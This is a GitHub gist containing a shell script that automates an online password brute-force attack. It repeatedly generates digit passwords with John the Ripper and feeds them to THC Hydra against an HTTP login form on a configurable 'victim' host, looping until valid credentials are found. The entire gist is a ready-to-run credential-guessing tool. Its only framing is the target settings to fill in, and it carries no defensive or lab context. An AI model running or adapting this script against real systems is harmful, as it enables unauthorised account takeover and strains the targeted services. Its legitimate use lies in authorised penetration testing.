Skip to content

Instantly share code, notes, and snippets.

@intrd
Last active March 3, 2017 06:05
Show Gist options
  • Save intrd/dbb1ed832b68c1362f991be3e5d9ad43 to your computer and use it in GitHub Desktop.
Save intrd/dbb1ed832b68c1362f991be3e5d9ad43 to your computer and use it in GitHub Desktop.
Bruteforcing with THC Hydra + John the ripper on-the-fly (funoverip shellscript reloaded by intrd)
#!/bin/sh
## Bruteforcing with THC Hydra + John the ripper on-the-fly (funoverip script reloaded by intrd)
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
hydra="hydra" #bin call of thchydra
john="john" #bin call of john
hydra_login="null"
hydra_module="http-form-post" #bruteforce type (in this case http)
hydra_module_options="/class.cgi:login&name=^USER^&password=^PASS^&login=Login:Invalid password" #your bruteforce sintax
hydra_host="domain.net" #host victm
hydra_port="80" #host victm port
hydra_nb_task="5" #threads
hydra_all_params="-f -l $hydra_login -t $hydra_nb_task -w 30 -vV -s $hydra_port" #use -e ns for blank passwds
john_sessionfile="$1"
john_all_params="--incremental:Digits --stdout" #your john sintax to generate pwds
john_time_step=10 # time(seconds) to run john
tmp_passwd="/tmp/pwd1234.tmp"
hydra_logfile="/tmp/hydralog"
if [ "$1" = "" ];then
echo "Usage: $0 <john session file>"
exit 0
fi
while [ 1 ];do
# this will start generate some passwords with john the ripper
echo; echo "- Start (re)generating passwords with John"
if [ -e "$john_sessionfile.rec" ];then
# if session exist, restore it
$john --restore=$john_sessionfile > $tmp_passwd &
else
# if session not exist yet, create it
$john $john_all_params --session=$john_sessionfile > $tmp_passwd &
fi
# wait 100 seconds, then kill john and start hydra on it
echo "- Wait ..."
sleep $john_time_step
echo "- Kill john"
killall john 2>/dev/null 1>/dev/null
sleep 1
# start hydra tries
echo; echo "- Start hydra"; echo
rm -f $hydra_logfile
echo "$hydra $hydra_host $hydra_module "$hydra_module_options" -P $tmp_passwd $hydra_all_params | tee -a $hydra_logfile"
$hydra $hydra_host $hydra_module "$hydra_module_options" -P $tmp_passwd $hydra_all_params | tee -a $hydra_logfile
# if a valid pair has been found, stop the loop
if grep -q valid "$hydra_logfile"; then
echo; echo "#### YAY! FOUND :) ####"
exit 0
fi
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment